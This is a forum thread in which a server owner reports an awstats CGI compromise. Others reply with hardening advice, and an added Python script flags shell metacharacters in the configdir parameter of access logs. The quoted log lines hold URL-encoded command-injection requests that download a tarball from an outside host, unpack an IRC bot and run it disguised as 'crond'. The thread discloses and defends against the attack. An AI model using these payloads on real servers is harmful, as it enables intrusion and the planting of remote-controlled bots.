I think i got hacked ;-(

McQueen (new member, joined Aug 16, 2007, 3 messages)
Hey guys,

I just thought I would let you know how my server got compromised. This
even happened after I installed the new version of awstats on Wednesday.
So in short I don't know if it is OK to run awstats as a CGI executable.

These are from my access log:

"GET
/cgi-bin/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bcurl%20%2d0%20wget%2
0Slasher%2ehell%2ero%2fbadboy%2etar%2ejpg%3btar%20%2dzxvf%20badboy%2eta
r%2ejpg%3bcd%20psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3bec
ho%20e_exp%3b%2500 HTTP/1.1" 200 485 "-" "-"

"GET
/cgi-bin/awstats.pl?
configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%20Slasher%2eidi
lis%2ero%2fbadboy%2etar%2ejpg%3btar%20%2dzxvf%20badboy%2etar%2ejpg%3bcd%20
psybnc%3bmv%20mech%20crond%3bexport%20PATH%3d%3bcrond%3becho%20e_exp%3b%
2500 HTTP/1.1" 200 634 "-" "-"


-cs
 
We got hacked too, 2 years ago, due to awstats.

Shame it's still unsafe =/

Perhaps mod_security will help you prevent this type of URL abuse.
 
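As an added example (not from any poster in this thread), the following script shows the kind of check a mod_security rule or a log-review job would apply to the access-log lines quoted above: it URL-decodes the awstats.pl `configdir` parameter repeatedly (so the doubled `%2500` becomes a NUL byte) and flags any value that contains shell metacharacters. The sample log lines are constructed for the example and use a placeholder host, not the one from the original post.

```python
"""Flag awstats.pl requests whose 'configdir' parameter carries shell
metacharacters once the URL encoding is stripped away."""
import re
from urllib.parse import unquote

# Characters that have no business in a configuration directory name.
SHELL_META = re.compile(r"[|;`$&<>\x00]")

# Extracts the request target from a common/combined-format access log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines modelled on the thread's log; 'attacker.example'
# is a placeholder host.
SAMPLE_LOG = [
    '"GET /cgi-bin/awstats.pl?config=example.com&output=main HTTP/1.1" 200 8812 "-" "-"',
    '"GET /cgi-bin/awstats.pl?configdir=%7cecho%20b_exp%3bcd%20%2ftmp%3b%2500 HTTP/1.1" 200 485 "-" "-"',
    '"GET /cgi-bin/awstats.pl?configdir=%2fetc%2fawstats HTTP/1.1" 200 9120 "-" "-"',
]


def decode_fully(value, rounds=3):
    """URL-decode until the value stops changing (bounded), so %2500 -> %00 -> NUL is caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_line(line):
    """Return the decoded configdir value if it looks like shell injection, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not path.endswith("/awstats.pl"):
        return None
    for pair in query.split("&"):
        key, _, raw = pair.partition("=")
        if key == "configdir":
            decoded = decode_fully(raw)
            if SHELL_META.search(decoded):
                return decoded
    return None


def scan(lines):
    """Return (line_index, decoded_configdir) for every suspicious line."""
    return [(i, flag_line(l)) for i, l in enumerate(lines) if flag_line(l) is not None]
```

A benign `configdir=/etc/awstats` passes, while the encoded pipe-and-semicolon chain is reported with its decoded form so the reviewer can see what the CGI would have been handed.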
So in short I don't know if it is OK to run awstats as a cgi executable.

Then you don't run it at all. You can run it if it's not executable.

One way to make it safe (safer) is to require it to be in a password protected directory.
 
Password protection is standard with the latest version, right?
Or does that come with the plugin :o
 
I think users can choose to password protect or not. I think you should scan to make sure they are password protected.
 